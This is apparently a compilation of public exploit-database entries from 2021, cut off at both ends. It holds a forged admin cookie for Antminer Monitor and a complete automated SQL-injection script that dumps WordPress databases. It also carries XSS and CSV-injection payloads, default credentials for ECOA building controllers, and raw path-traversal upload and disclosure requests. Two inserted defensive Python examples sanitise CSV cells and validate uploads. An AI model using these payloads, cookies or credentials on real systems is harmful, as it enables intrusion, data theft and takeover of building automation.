    # define logger
    logging.basicConfig(format='[%(asctime)s][%(levelname)s] %(message)s',
                        datefmt='%d %b %Y %H:%M:%S',
                        level='INFO' if not args.debug else 'DEBUG')
    logging.SUCCESS = logging.CRITICAL + 1
    logging.addLevelName(logging.SUCCESS, '\033[0m\033[1;32mGOOD\033[0m')
    logging.addLevelName(logging.ERROR, '\033[0m\033[1;31mFAIL\033[0m')
    logging.addLevelName(logging.WARNING, '\033[0m\033[1;33mWARN\033[0m')
    logging.addLevelName(logging.INFO, '\033[0m\033[1;36mINFO\033[0m')
    logging.success = lambda msg, *args: logging.getLogger(__name__)._log(logging.SUCCESS, msg, args)
    # print banner
    print(BANNER)
    # run exploit
    exploit(args.url, args.file)
```
-
Antminer Monitor 0.5.0 - Authentication Bypass
# Exploit Title: Antminer Monitor 0.5.0 - Authentication Bypass
# Date: 09/06/2021
# Dork: https://www.zoomeye.org/searchResult?q=%22antminer%20monitor%22
# Exploit Author: CQR.company / Vulnz.
# Vendor Homepage: https://github.com/anselal/antminer-monitor, https://twitter.com/intent/follow?screen_name=AntminerMonitor
# Software Link: https://github.com/anselal/antminer-monitor, https://soulis.tech/
# Version: 0.5.0
# Tested on: Windows, Linux, macOS

The software is commonly used for monitoring Antminers and can easily be found in ZoomEye (800) and Shodan (500). For now this is the most popular Antminer monitoring tool.

The vulnerability in Antminer Monitor exists because of a backdoor or misconfiguration by the developer inside the settings file of the Flask server. The settings file has a predefined secret string, which would normally be randomly generated; however, it is static in this build:
https://github.com/anselal/antminer-monitor/blob/5c62e1064af30674bacb9e1917d5980efbde1fcd/config/settings.py

The secret key is 'super secret key'. Based on this information we can craft authorization bypass cookies. Using the flask-unsign tool we can generate a cookie which will provide admin access:

flask-unsign --sign --cookie "{'_fresh': True, '_id': b'df230a95eb5318d31fa83690c667cfd6a824dbfe61949bf30b9d75e71c6ea20714b87113fcafe2340df9a8a6f3567e7a2faedc2c12d05e4e338558e47afe84f6', '_user_id': '1', 'csrf_token': b'15d0261b7f3f40849920ebb94f7a2368397f76ff'}" --secret "super secret key"

Additionally, you can use this universal cookie to access the web interface of the Flask application. This cookie should work on all systems when placed in the "session" field:

.eJw9j81Og0AURl_FzLoLfmTTpAubaQkm9xLMpeTeTaNAGQdGE9BQp-m7O3HhA3zfOeemzpe5X4zaXl6npd-o83untjf18Ka2SnL-Ab83JZ0mtrUHMiP4o2MaPNpxZc8JJuhEiyl1EUn-7IT4WlKVsWMPeZGJbmOh9speJqZiRX-I2A4p0MGLQyOuDoxqDayMyRgMOyROhToDTow0LxYcXMFVKzZ1JAS-1HVc5nWEyTHwhkgs79Q9uH8v_fwXoGK1Ue0yX85fn2P_8V8EdBpBFwk0RSoWHeqnR9RjBnY_sSsyzDkNlqFu8CV1DoOjDLvwfv8FnZ1jTQ.YS2Hvw.a-bvt7Y4e2kKNs0iXkRxHnRRJAU

In addition, DEBUG = True, which means /console works; however, it needs the PIN.
-
WordPress Plugin WP Sitemap Page 1.6.4 - Stored Cross-Site Scripting (XSS)
# Exploit Title: WordPress Plugin WP Sitemap Page 1.6.4 - Stored Cross-Site Scripting (XSS)
# Date: 07/09/2021
# Exploit Author: Nikhil Kapoor
# Software Link: https://wordpress.org/plugins/wp-sitemap-page/
# Version: 1.6.4
# Category: Web Application
# Tested on Windows

How to Reproduce this Vulnerability:

1. Install WordPress 5.8.0
2. Install and activate WP Sitemap Page
3. Navigate to Settings >> WP Sitemap Page >> Settings and enter the XSS payload into the "How to display the posts" input field.
4. Click Save Changes.
5. You will observe that the payload is stored in the database, and when the same functionality is triggered the JavaScript payload executes and a pop-up appears.
6. Payload Used: </textarea><svg/onload=confirm('XSS')>
-
WordPress Plugin Survey & Poll 1.5.7.3 - 'sss_params' SQL Injection (2)
# Exploit Title: WordPress Plugin Survey & Poll 1.5.7.3 - 'sss_params' SQL Injection (2)
# Date: 2021-09-07
# Exploit Author: Mohin Paramasivam (Shad0wQu35t)
# Vendor Homepage: http://modalsurvey.pantherius.com/
# Software Link: https://downloads.wordpress.org/plugin/wp-survey-and-poll.zip
# Version: 1.5.7.3
# Tested on: MariaDB,MYSQL

#!/usr/bin/python3
import requests
import re
import warnings
from bs4 import BeautifulSoup, CData
import sys
import argparse
import os
import time
from termcolor import colored
import validators

#Install all the requirements
"""
pip3 install requests
pip3 install bs4
pip3 install argparse
pip3 install termcolor
pip3 install validators
"""

parser = argparse.ArgumentParser(description='WP Plugin Survey & Poll V1.5.7.3 SQL Injection (sss_params)')
parser.add_argument('-u',help='Poll & Survey page URL')
args = parser.parse_args()
url = args.u

if len(sys.argv) !=3:
    parser.print_help(sys.stderr)
    sys.exit()

if not validators.url(url):
    print(colored("\r\nEnter URL with http:// or https://\r\n",'red'))
    parser.print_help(sys.stderr)
    sys.exit()

def currect_db_name():
    payload= """["1650149780')) OR 1=2 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,database(),11#"]"""
    inject(payload)

def db_version():
    payload = """["1650149780')) OR 1=2 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,@@version,11#"]"""
    inject(payload)

def hostname():
    payload = """["1650149780')) OR 1=2 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,@@hostname,11#"]"""
    inject(payload)

def current_user():
    payload = """["1650149780')) OR 1=2 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,user(),11#"]"""
    inject(payload)

def list_databases():
    payload = """["1650149780')) OR 1=2 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,group_concat(schema_name),11 from information_schema.schemata#"]"""
    inject(payload)

def list_tables_db():
    db = input("\r\nDatabase : ")
    payload = """["1650149780')) OR 1=2 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,group_concat(table_name),11 from information_schema.tables where table_schema='%s'#"]""" %(db)
    inject(payload)

def list_columns_db():
    db = input("\r\nDatabase : ")
    table = input("Table : ")
    payload = """["1650149780')) OR 1=2 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,group_concat(column_name),11 from information_schema.columns where table_schema='%s' and table_name='%s'#"]""" %(db,table)
    inject(payload)

def dump_db():
    db = input("\r\nDatabase: ")
    table = input("Table: ")
    column = input("Columns Eg: users,password : ")
    dump = "%s.%s" %(db,table)
    payload = """["1650149780')) OR 1=2 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,group_concat(%s),11 from %s.%s#"]""" %(column,db,table)
    inject(payload)

def custom_payload():
    payload = input("\r\nPayload : ")
    inject(payload)

def inject(inject_payload):
    request = requests.Session()
    cookies = {
        'wp_sap': inject_payload,
    }
    print("\r\n"+colored("Sending Payload :",'red')+" %s\r\n" %colored((inject_payload),'green'))
    response = request.get(url,cookies=cookies)
    warnings.filterwarnings("ignore", category=UserWarning, module='bs4')
    soup = BeautifulSoup(response.text,features="lxml")
    cdata = soup.find(text=re.compile("CDATA"))
    split_cdata = list(cdata.split(':'))
    output = split_cdata[11]
    print("\r\n"+colored("SQLI OUTPUT :",'red')+" %s\r\n" %colored((output),'green'))
    time.sleep(1)
    main()

def main():
    print ("Automated SQL Injector (wp-survey-and-poll)")
    print ("Enter the respective number to select option")
    print ("#EXAMPLE Option : 1\r\n")
    print("Option 1 : Grab Database Version")
    print("Option 2 : Get Current Database Name")
    print("Option 3 : Get Hostname ")
    print("Option 4 : Get Current User")
    print("Option 5 : List All Databases")
    print("Option 6 : List Tables From Database")
    print("Option 7 : List Columns from Tables")
    print("Option 8 : Dump Database")
    print("Option 9 : Custom Payload")
    print("Option 10 : Exit")
    print("\r\n")
    option_selected = str(input("Select Option : "))
    if(option_selected=="1"):
        db_version()
    if(option_selected=="2"):
        currect_db_name()
    if(option_selected=="3"):
        hostname()
    if(option_selected=="4"):
        current_user()
    if(option_selected=="5"):
        list_databases()
    if(option_selected=="6"):
        list_tables_db()
    if(option_selected=="7"):
        list_columns_db()
    if(option_selected=="8"):
        dump_db()
    if(option_selected=="9"):
        custom_payload()
    if(option_selected=="10"):
        sys.exit()
    else:
        main()

main()
-
WordPress Plugin TablePress 1.14 - CSV Injection
# Exploit Title: WordPress Plugin TablePress 1.14 - CSV Injection
# Date: 07/09/2021
# Exploit Author: Nikhil Kapoor
# Vendor Homepage:
# Software Link: https://wordpress.org/plugins/tablepress/
# Version: 1.14
# Category: Web Application
# Tested on Windows

How to Reproduce this Vulnerability:

1. Install WordPress 5.8.0
2. Install and activate TablePress
3. Navigate to TablePress >> Add New >> Enter Table Name and Description (If You want this is Optional) >> Select Number of Rows and Columns
4. Click on Add Table
5. Now in Table Content Input Field Enter CSV Injection Payload
6. Click on Save Changes
7. Now go to All Table in TablePress select our entered table >> Click on Export >> Select CSV as an Export Format.
8. Click on Download Export File
9. Open the exported CSV file you will see that CSV Injection got Successfully Executed.

Payload Used :- @SUM(1+9)*cmd|' /C calc'!A0
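The usual mitigation for the export path described above is to neutralise formula-triggering cells at write time, so a spreadsheet opening the file treats them as text. The following is an added example written for this entry; it is not TablePress code, and the sample rows (including the payload quoted above) are constructed for illustration.

```python
"""Neutralise spreadsheet formula injection when exporting user-supplied cells to CSV.

Added example, not TablePress code.  The sample rows below are constructed;
the last one carries the payload quoted in the advisory above."""
import csv
import io

# Leading characters that make Excel/LibreOffice evaluate a cell as a formula,
# plus the whitespace variants used to slip past a naive "starts with =" check.
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")


def sanitize_cell(value):
    """Return a cell value that a spreadsheet will render as literal text.

    A leading single quote forces text interpretation.  Cells that do not
    start with a trigger character are returned unchanged, so ordinary
    text and positive numbers are not altered.  None becomes an empty cell.
    """
    text = "" if value is None else str(value)
    if text.startswith(FORMULA_TRIGGERS):
        return "'" + text
    return text


def export_csv(rows):
    """Serialise rows (a list of lists) to a CSV string with every cell sanitised.

    QUOTE_ALL keeps the injected quote and any embedded separators intact
    across a round trip through csv readers.
    """
    buf = io.StringIO()
    writer = csv.writer(buf, quoting=csv.QUOTE_ALL, lineterminator="\n")
    for row in rows:
        writer.writerow([sanitize_cell(cell) for cell in row])
    return buf.getvalue()


# Constructed sample table.
SAMPLE_ROWS = [
    ["Name", "Amount", "Note"],
    ["Alice", "42", "plain text"],
    ["Bob", "-3", "negative number: also a trigger character"],
    ["Mallory", "1", "@SUM(1+9)*cmd|' /C calc'!A0"],
]

if __name__ == "__main__":
    print(export_csv(SAMPLE_ROWS))
```

The trade-off is visible in the "Bob" row: a cell holding a negative number is prefixed too, because "-" is a valid formula lead character. Exporters that must keep numeric cells numeric typically apply the prefix only to non-numeric strings; either way the prefix is a display-layer control, and the consuming spreadsheet's DDE/external-content prompts remain the second line of defence.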
-
Bus Pass Management System 1.0 - 'adminname' Stored Cross-Site Scripting (XSS)
# Exploit Title: Bus Pass Management System 1.0 - 'adminname' Stored Cross-Site Scripting (XSS)
# Date: 2021-09-08
# Exploit Author: Emre Aslan
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/wp-content/uploads/2021/07/Bus-Pass-Management-System-Using-PHP-MySQL.zip
# Version: 1.0
# Tested on: Windows 11 - XAMPP Server
# Vulnerable page: host/admin/*
# Vulnerable Code: <div class="user-info"><div><strong>Admin[PAYLOAD]</strong></div>
# Vulnerable Parameter: adminname[ POST Data ]
# Tested Payload: <svg/onload=alert('XSS')>

# Proof Of Concept:
# 1 - Login the dashboard
# 2 - Go to /admin/admin-profile.php
# 3 - set admin name with payload
# 4 - xss fires
-
Active WebCam 11.5 - Unquoted Service Path
# Exploit Title: Active WebCam 11.5 - Unquoted Service Path
# Exploit Author: Salman Asad (@deathflash1411) a.k.a LeoBreaker
# Date: 09.09.2021
# Software Link: https://www.techspot.com/downloads/175-active-webcam.html
# Vendor Homepage: https://www.pysoft.com/
# Version: 11.5
# Tested on: Windows 10
# Note: "Start on Windows Startup" with "Start as Service" must be enabled in Program Options

# Proof of Concept:

C:\Users\death>sc qc ACTIVEWEBCAM
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: ACTIVEWEBCAM
        TYPE               : 110  WIN32_OWN_PROCESS (interactive)
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files\Active WebCam\WebCam.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Active WebCam
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

C:\Users\death>cmd /c wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """
Active WebCam    ACTIVEWEBCAM    C:\Program Files\Active WebCam\WebCam.exe    Auto
-
Men Salon Management System 1.0 - Multiple Vulnerabilities
# Exploit Title: Men Salon Management System 1.0 - Multiple Vulnerabilities
# Date: 2021-09-09
# Exploit Author: Aryan Chehreghani
# Vendor Homepage: https://phpgurukul.com
# Software Link: https://phpgurukul.com/men-salon-management-system-using-php-and-mysql
# Version: 1.0
# Tested on: Windows 10 - XAMPP Server
# Vulnerable page : http://localhost/msms/admin/edit-customer-detailed.php?editid=

# Proof Of Concept :
# 1 . Download And install [ Men Salon Management System ]
# 2 . Go to /msms/admin/index.php and Enter Username & Password
# 3 . Navigate to >> Customer List
# 4 . In the action column, click Edit
# 5 . Enter the payload into the Url and Fields

# [ Sql Injection ] :
Vulnerable parameter : The editid parameter is Vulnerable to sqli
GET : http://localhost/msms/admin/edit-customer-detailed.php?editid=2'+union+select+1,database(),3,4,5,6,7,8--+

# [ Stored Cross-Site Scripting ] :
Vulnerable Fields : Name & Email
Payload Used: "><script>alert(document.cookie)</script>
-
ECOA Building Automation System - Weak Default Credentials
# Exploit Title: ECOA Building Automation System - Weak Default Credentials
# Date: 25.06.2021
# Exploit Author: Neurogenesia
# Vendor Homepage: http://www.ecoa.com.tw

ECOA Building Automation System Weak Default Credentials

Vendor: ECOA Technologies Corp.
Product web page: http://www.ecoa.com.tw
Affected version: ECOA ECS Router Controller - ECS (FLASH)
                  ECOA RiskBuster Terminator - E6L45
                  ECOA RiskBuster System - RB 3.0.0
                  ECOA RiskBuster System - TRANE 1.0
                  ECOA Graphic Control Software
                  ECOA SmartHome II - E9246
                  ECOA RiskTerminator

Summary:

#1 The Risk-Terminator Web Graphic control BEMS (Building Energy Management System) are designed to provide you with the latest in the Human Machine Interface (HMI) technology, for completely monitoring and controlling management. It may be used singly for small and medium sized facilities, could be linked together via the high-speed Ethernet to other servers that suit to World Wide Web (WWW) or Local Area Network (LAN) for large and more sophisticated applications. The Risk-Terminator practice Web basic conception that with operation simply and conveniently, totally share risk and make sure of security. Even remote sites may be controlled and monitored through Ethernet port, which base on standard transferring protocol like XML, Modbus TCP/IP or BACnet or URL.

#2 The RiskBuster is a Web enabled network Router Server that uses Ethernet and TCP/IP networking technologies. It incorporates an embedded web server that can deliver user-specific web pages to any PC or mobile terminal running internet browser software. A user with appropriate security codes can make adjustments or monitor the network control unit from any internet access point in the world. It also provides network management, integration and process control functions for any existing or new building controllers and microprocessor based equipments or system in buildings. The management function provided by the RiskBuster such as trend log and alarm generation improves building controllers and microprocessor based equipments or system management and audit trail capabilities. The integration function provided by the RiskBuster allows seamless integration such as information sharing (read/write) between building controllers and microprocessor based equipments or system without any need of major upgrade or equipments replacement and allow cost saving. The process control functions provided by the RiskBuster allow global control action to be implemented across any building controllers and microprocessor based equipments or system to allow full building control. The RiskBuster provide a truly cost effective solution for any building automation or high level integration application. A truly Ethernet network compliant feature allows the RiskBuster to be install anywhere in the building.

#3 ECM0000160 Digital Logic Controller (DLC) are Pre-programmed controller it intended for Building Automate System; Environment control system; HVAC control system and other types of equipment. Being fully programmable it ensures complete application versatility, allowing specific products to be created according to customer requests. This controller is a configurable unitary controller based on the 32bit series microcomputer, with an on-board clock, have two RS-485 local bus.

#4 The ECS0000160 is a Router Controller for building and industry products based on various microprocessors. It not only accessing information but also monitoring and controlling across Internet directly. The ECS0000160 can totally replace and improve a typical system that always has tedious panel and complex working process. An obvious benefit to our customers is that ECS0000160 enabling them to interact with their systems anytime, anywhere, not only just allowed to connect with singular specific operating system. It's like a whole package, which provides browsers an easy platform to monitor and control the doors, alarms, devices, etc. that all through web-pages operating, which works base on standard transmission Internet protocol. The ECS0000160 provides a low industry cost. A truly friendly network interface which is simple and easy to apply on factory floors. It supports from serial ports with options of RS485.

#5 HOME SERVER-EHC9246150 - This web basic home-server is with the specifications of hidden installation, 32bits microcomputer and I/O Peripheral expansion circuit, which include: D/A conversion circuit, A/D conversion circuit and optical isolation circuit, using default proportional, integral and differential (P+I+D) and dead-zone control to control accurately. The controller features contains the sensing system, proportional control systems, computing modules, control modules, alarm detection system, and so on. It mainly used in building control, plant monitoring, air monitoring, lighting and power control, the use of premises for buildings, factories, offices, conference rooms, restaurants, hotels, etc.

Desc: The BAS controller uses a weak set of default administrative credentials that can be easily guessed in remote password attacks and gain full control of the system.

Tested on: EMBED/1.0
           Apache Tomcat/6.0.44
           Apache Tomcat/6.0.18
           Windows Server
           MySQL Version 5.1.60
           MySQL Version 4.0.16
           Version 2.0.1.28 20180628

Vulnerability discovered by Neurogenesia
                            @zeroscience

Advisory ID: ZSL-2021-5668
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5668.php

25.06.2021

--

Default / Weak Credentials
--------------------------

- Attacker can use default credentials and authenticate to the SmartHome, Building Automation and Access Control System.

Credentials:
guest:guest
user:user
admin:admin
root:embed
embed:power
administrator:empty
humex:humex4377
ecoa:ecoa4377
-
ECOA Building Automation System - Path Traversal Arbitrary File Upload
# Exploit Title: ECOA Building Automation System - Path Traversal Arbitrary File Upload
# Date: 25.06.2021
# Exploit Author: Neurogenesia
# Vendor Homepage: http://www.ecoa.com.tw

ECOA Building Automation System Path Traversal Arbitrary File Upload

Vendor: ECOA Technologies Corp.
Product web page: http://www.ecoa.com.tw
Affected version: ECOA ECS Router Controller - ECS (FLASH)
                  ECOA RiskBuster Terminator - E6L45
                  ECOA RiskBuster System - RB 3.0.0
                  ECOA RiskBuster System - TRANE 1.0
                  ECOA Graphic Control Software
                  ECOA SmartHome II - E9246
                  ECOA RiskTerminator

Summary:

#1 The Risk-Terminator Web Graphic control BEMS (Building Energy Management System) are designed to provide you with the latest in the Human Machine Interface (HMI) technology, for completely monitoring and controlling management. It may be used singly for small and medium sized facilities, could be linked together via the high-speed Ethernet to other servers that suit to World Wide Web (WWW) or Local Area Network (LAN) for large and more sophisticated applications. The Risk-Terminator practice Web basic conception that with operation simply and conveniently, totally share risk and make sure of security. Even remote sites may be controlled and monitored through Ethernet port, which base on standard transferring protocol like XML, Modbus TCP/IP or BACnet or URL.

#2 The RiskBuster is a Web enabled network Router Server that uses Ethernet and TCP/IP networking technologies. It incorporates an embedded web server that can deliver user-specific web pages to any PC or mobile terminal running internet browser software. A user with appropriate security codes can make adjustments or monitor the network control unit from any internet access point in the world. It also provides network management, integration and process control functions for any existing or new building controllers and microprocessor based equipments or system in buildings. The management function provided by the RiskBuster such as trend log and alarm generation improves building controllers and microprocessor based equipments or system management and audit trail capabilities. The integration function provided by the RiskBuster allows seamless integration such as information sharing (read/write) between building controllers and microprocessor based equipments or system without any need of major upgrade or equipments replacement and allow cost saving. The process control functions provided by the RiskBuster allow global control action to be implemented across any building controllers and microprocessor based equipments or system to allow full building control. The RiskBuster provide a truly cost effective solution for any building automation or high level integration application. A truly Ethernet network compliant feature allows the RiskBuster to be install anywhere in the building.

#3 ECM0000160 Digital Logic Controller (DLC) are Pre-programmed controller it intended for Building Automate System; Environment control system; HVAC control system and other types of equipment. Being fully programmable it ensures complete application versatility, allowing specific products to be created according to customer requests. This controller is a configurable unitary controller based on the 32bit series microcomputer, with an on-board clock, have two RS-485 local bus.

#4 The ECS0000160 is a Router Controller for building and industry products based on various microprocessors. It not only accessing information but also monitoring and controlling across Internet directly. The ECS0000160 can totally replace and improve a typical system that always has tedious panel and complex working process. An obvious benefit to our customers is that ECS0000160 enabling them to interact with their systems anytime, anywhere, not only just allowed to connect with singular specific operating system. It's like a whole package, which provides browsers an easy platform to monitor and control the doors, alarms, devices, etc. that all through web-pages operating, which works base on standard transmission Internet protocol. The ECS0000160 provides a low industry cost. A truly friendly network interface which is simple and easy to apply on factory floors. It supports from serial ports with options of RS485.

#5 HOME SERVER-EHC9246150 - This web basic home-server is with the specifications of hidden installation, 32bits microcomputer and I/O Peripheral expansion circuit, which include: D/A conversion circuit, A/D conversion circuit and optical isolation circuit, using default proportional, integral and differential (P+I+D) and dead-zone control to control accurately. The controller features contains the sensing system, proportional control systems, computing modules, control modules, alarm detection system, and so on. It mainly used in building control, plant monitoring, air monitoring, lighting and power control, the use of premises for buildings, factories, offices, conference rooms, restaurants, hotels, etc.

Desc: The BAS controller suffers from an arbitrary file write and directory traversal vulnerability. Using the POST parameters 'rbt' and 'filename', attackers can set arbitrary values for location and content type and gain the possibility to execute arbitrary code on the affected device.

Tested on: EMBED/1.0
           Apache Tomcat/6.0.44
           Apache Tomcat/6.0.18
           Windows Server
           MySQL Version 5.1.60
           MySQL Version 4.0.16
           Version 2.0.1.28 20180628

Vulnerability discovered by Neurogenesia
                            @zeroscience

Advisory ID: ZSL-2021-5669
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5669.php

25.06.2021

--

Directory Traversal / File Path Traversal / Unrestricted File Upload
--------------------------------------------------------------------

- Abusing the 'filename' and 'rbt' POST parameters, an attacker can navigate outside the current directory and write files in an arbitrary location.
- There is no validation on file content, file extension and file location.

Request:

POST /ebd-bin/upload HTTP/1.1
Host: 192.168.1.3:8080

------WebKitFormBoundaryvxy2zFDs1Z69pfRB
Content-Disposition: form-data; name="rbt"

ecsfile
------WebKitFormBoundaryvxy2zFDs1Z69pfRB
Content-Disposition: form-data; name="filename"; filename="../../../anyfile.ext"
Content-Type: application/octet-stream

ANY_CONTENT_HERE
------WebKitFormBoundaryvxy2zFDs1Z69pfRB--
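The advisory names three controls the upload handler lacks: validation of file location, file extension and file content. The following is an added example of how a server-side handler enforces all three before writing anything to disk; it is not ECOA code, the upload directory, extension allow-list and size cap are assumptions, and the sample cases (the first reuses the filename from the request above) are constructed.

```python
"""Server-side validation of an upload before it touches disk.

Added example for the ECOA upload advisory; not ECOA code.  UPLOAD_DIR,
ALLOWED_EXTENSIONS and MAX_SIZE are assumptions, and SAMPLE_CASES are
constructed.  Each of the three missing controls named in the advisory
(location, extension, content) is enforced in resolve_upload_target()."""
from pathlib import Path, PurePosixPath

UPLOAD_DIR = "uploads"                         # assumed upload root (relative to cwd)
ALLOWED_EXTENSIONS = {".bin", ".tbl", ".lst"}  # assumed allow-list of data files
MAX_SIZE = 1024 * 1024                         # assumed cap: 1 MiB


class UploadRejected(ValueError):
    """Raised when any check fails; the message names the failing control."""


def resolve_upload_target(base_dir, client_filename, content):
    """Return the absolute path the upload may be written to, or raise UploadRejected.

    location:  only the last path component of the client-supplied name is
               kept, so '../../../x' collapses to 'x'; the resolved target
               must additionally sit directly inside base_dir.
    extension: the suffix must be on the allow-list.
    content:   the body must be non-empty and under the size cap.
    """
    base = Path(base_dir).resolve()
    # Normalise Windows separators first so 'dir\\..\\x' is not taken as a flat name.
    name = PurePosixPath(client_filename.replace("\\", "/")).name
    if not name or name in (".", "..") or "\x00" in name:
        raise UploadRejected("location: invalid filename")
    if PurePosixPath(name).suffix.lower() not in ALLOWED_EXTENSIONS:
        raise UploadRejected("extension: not allowed")
    if not content or len(content) > MAX_SIZE:
        raise UploadRejected("content: empty or over size cap")
    target = (base / name).resolve()
    # Defence in depth: catches anything the basename step somehow let through.
    if target.parent != base:
        raise UploadRejected("location: escapes upload directory")
    return target


def describe_upload(client_filename, content, base_dir=UPLOAD_DIR):
    """Run the checks and report 'ok: <basename>' or 'rejected: <reason>'."""
    try:
        return "ok: " + resolve_upload_target(base_dir, client_filename, content).name
    except UploadRejected as exc:
        return "rejected: " + str(exc)


# Constructed cases; the first reuses the filename from the advisory's request.
SAMPLE_CASES = [
    ("../../../anyfile.ext", b"ANY_CONTENT_HERE"),
    ("../../../../etc/passwd.bin", b"x"),      # traversal collapses to a plain name
    ("symtbl.tbl", b"\x00" * 64),
    ("server.lst", b""),
    ("webnewc.elf", b"\x7fELF"),
]

if __name__ == "__main__":
    for fname, body in SAMPLE_CASES:
        print(f"{fname!r:32} -> {describe_upload(fname, body)}")
```

Collapsing to the basename silently accepts a traversal attempt with an allowed extension (the second case above); a stricter policy rejects any name that contains a path separator outright, and in either case the rejection should be logged, since a client sending "../" in a multipart filename is a useful detection signal. The content check here is deliberately minimal; a device that expects specific file formats would parse the body and verify it before accepting it.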
-
ECOA Building Automation System - Directory Traversal Content Disclosure
# Exploit Title: ECOA Building Automation System - Directory Traversal Content Disclosure
# Date: 25.06.2021
# Exploit Author: Neurogenesia
# Vendor Homepage: http://www.ecoa.com.tw

ECOA Building Automation System Directory Traversal Content Disclosure

Vendor: ECOA Technologies Corp.
Product web page: http://www.ecoa.com.tw
Affected version: ECOA ECS Router Controller - ECS (FLASH)
                  ECOA RiskBuster Terminator - E6L45
                  ECOA RiskBuster System - RB 3.0.0
                  ECOA RiskBuster System - TRANE 1.0
                  ECOA Graphic Control Software
                  ECOA SmartHome II - E9246
                  ECOA RiskTerminator

Summary:

#1 The Risk-Terminator Web Graphic control BEMS (Building Energy Management System) are designed to provide you with the latest in the Human Machine Interface (HMI) technology, for completely monitoring and controlling management. It may be used singly for small and medium sized facilities, could be linked together via the high-speed Ethernet to other servers that suit to World Wide Web (WWW) or Local Area Network (LAN) for large and more sophisticated applications. The Risk-Terminator practice Web basic conception that with operation simply and conveniently, totally share risk and make sure of security. Even remote sites may be controlled and monitored through Ethernet port, which base on standard transferring protocol like XML, Modbus TCP/IP or BACnet or URL.

#2 The RiskBuster is a Web enabled network Router Server that uses Ethernet and TCP/IP networking technologies. It incorporates an embedded web server that can deliver user-specific web pages to any PC or mobile terminal running internet browser software. A user with appropriate security codes can make adjustments or monitor the network control unit from any internet access point in the world. It also provides network management, integration and process control functions for any existing or new building controllers and microprocessor based equipments or system in buildings. The management function provided by the RiskBuster such as trend log and alarm generation improves building controllers and microprocessor based equipments or system management and audit trail capabilities. The integration function provided by the RiskBuster allows seamless integration such as information sharing (read/write) between building controllers and microprocessor based equipments or system without any need of major upgrade or equipments replacement and allow cost saving. The process control functions provided by the RiskBuster allow global control action to be implemented across any building controllers and microprocessor based equipments or system to allow full building control. The RiskBuster provide a truly cost effective solution for any building automation or high level integration application. A truly Ethernet network compliant feature allows the RiskBuster to be install anywhere in the building.

#3 ECM0000160 Digital Logic Controller (DLC) are Pre-programmed controller it intended for Building Automate System; Environment control system; HVAC control system and other types of equipment. Being fully programmable it ensures complete application versatility, allowing specific products to be created according to customer requests. This controller is a configurable unitary controller based on the 32bit series microcomputer, with an on-board clock, have two RS-485 local bus.

#4 The ECS0000160 is a Router Controller for building and industry products based on various microprocessors. It not only accessing information but also monitoring and controlling across Internet directly. The ECS0000160 can totally replace and improve a typical system that always has tedious panel and complex working process. An obvious benefit to our customers is that ECS0000160 enabling them to interact with their systems anytime, anywhere, not only just allowed to connect with singular specific operating system. It's like a whole package, which provides browsers an easy platform to monitor and control the doors, alarms, devices, etc. that all through web-pages operating, which works base on standard transmission Internet protocol. The ECS0000160 provides a low industry cost. A truly friendly network interface which is simple and easy to apply on factory floors. It supports from serial ports with options of RS485.

#5 HOME SERVER-EHC9246150 - This web basic home-server is with the specifications of hidden installation, 32bits microcomputer and I/O Peripheral expansion circuit, which include: D/A conversion circuit, A/D conversion circuit and optical isolation circuit, using default proportional, integral and differential (P+I+D) and dead-zone control to control accurately. The controller features contains the sensing system, proportional control systems, computing modules, control modules, alarm detection system, and so on. It mainly used in building control, plant monitoring, air monitoring, lighting and power control, the use of premises for buildings, factories, offices, conference rooms, restaurants, hotels, etc.

Desc: The BAS controller suffers from a directory traversal content disclosure vulnerability. Using the GET parameter 'cpath' in File Manager (fmangersub), attackers can disclose directory content on the affected device.

Tested on: EMBED/1.0
           Apache Tomcat/6.0.44
           Apache Tomcat/6.0.18
           Windows Server
           MySQL Version 5.1.60
           MySQL Version 4.0.16
           Version 2.0.1.28 20180628

Vulnerability discovered by Neurogenesia
                            @zeroscience

Advisory ID: ZSL-2021-5670
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5670.php

25.06.2021

--

Directory Traversal Content Disclosure
--------------------------------------

- Abusing the 'cpath' GET parameter, attackers can disclose directory contents by directory traversal attacks.
- cpath=.
- cpath=../../../../../../../etc

Request:

GET /fmangersub?cpath=/ HTTP/1.1
Host: 192.168.1.3:8080

bacevent.elf
redown.elf
system.bin
webnewc.elf
err.txt
hole.elf
modbustcp.elf
ianplc.bin
hitachi.el
bacser.elf
root.pem
pwsd.bin
server.lst
symtbl.tbl
client.pem
gb-unicode.bin
httpser.elf
namelst.bin
AI.tbl
BI.tbl
AV.tbl
BV.tbl
mstplalf
rthost.elf
big5-unicode.bin
version.bin
modbus.elf
rbdev.bin
rbdlc.elf
powercrd.elf
-
ECOA Building Automation System - 'multiple' Cross-Site Request Forgery (CSRF)
# Exploit Title: ECOA Building Automation System - 'multiple' Cross-Site Request Forgery (CSRF)
# Date: 25.06.2021
# Exploit Author: Neurogenesia
# Vendor Homepage: http://www.ecoa.com.tw

ECOA Building Automation System Cross-Site Request Forgery

Vendor: ECOA Technologies Corp.
Product web page: http://www.ecoa.com.tw
Affected version: ECOA ECS Router Controller - ECS (FLASH)
                  ECOA RiskBuster Terminator - E6L45
                  ECOA RiskBuster System - RB 3.0.0
                  ECOA RiskBuster System - TRANE 1.0
                  ECOA Graphic Control Software
                  ECOA SmartHome II - E9246
                  ECOA RiskTerminator

Summary:

